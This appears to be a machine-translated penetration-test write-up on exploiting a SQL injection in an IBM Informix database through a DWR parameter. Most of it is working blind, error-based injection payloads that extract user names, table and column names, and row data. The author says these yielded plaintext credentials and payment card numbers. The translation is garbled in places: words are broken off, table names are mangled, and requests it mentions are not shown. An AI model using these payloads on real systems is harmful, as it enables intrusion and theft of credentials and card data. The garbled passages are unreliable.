Informix Database SQL injection practice

In a recent application penetration test, I found an interesting SQL Vulnerability (in SQLI ).

SQLI causes this situation:
1. Problems in development
2. The database is in use

Next, I will introduce the problems I encountered and how to solve and dump the database. This application uses a JAVA Remote Call framework named DWR backend. The system call is as follows:

This is a parameter located in the C0-param1 and looks easy from the surface as it gives detailed error information that gets the following error message when a single quotation mark is added to the end of the parameter: "java. SQL. SQLException: A syntax error has occurred. "(syntax error)

C0-param1 parameters control how many results are retrieved from the database, which is injected into TOP keyword locations similar to mssql and MYSQL Limit. I think SQLI is more suitable for running MSSQL databases than MYSQL. Shows how to add a series of requests:

After the query is executed, an error message is displayed: "java. SQL. SQLException: The column (card_no) must be in the group by list. the database system is IBM's Informix, And I know little about Informix, so I still have a function to query IBM's documentation.
Now we know that this is Informix, which can help us to produce the next injection. The first clause, like TOP and LIMIT, looks like this:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

If the condition is true (that is, the first letter of the current user name is 'A'), the query returns the result. Otherwise, an error is returned because the subquery (SELECT 1 FROM orders Ables) multiple results are returned. However, it is difficult to use equal signs. replace them with the following statement:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

With these injection knowledge and concepts, it would be much better to get out of sqlmap (I got some tips from my colleagues and watched his post "Sqlmap advanced injection techniques "), sqlmap is indeed a good tool. The author wrote it at the Conference this year... It seems that the question is gone. Unfortunately, Sqlmap does not support Informix, so I have to write the tool myself:

Get the Table Name Length:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

Get table name:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

Obtain the number of columns in a table:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

 

Get the column Name Length:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

Retrieve column Name:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

Through a small study, I found that the Informix table actually has a very deep hidden column name: ROWID, and each row has a serial number like this. However, these rowids can be dispersed, deleted, or inserted into tables. To find the ROWID that contains data, I call a function named NVL, which returns different results, depending on whether the first parameter is NULL. Finally, find a column that may always contain data. Statement:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

In this way, you can find plain text application creden。, plain text bank SFTP creden。, and unencrypted payment card numbers.
With this success, I understand what I previously wanted to know about the Informix database.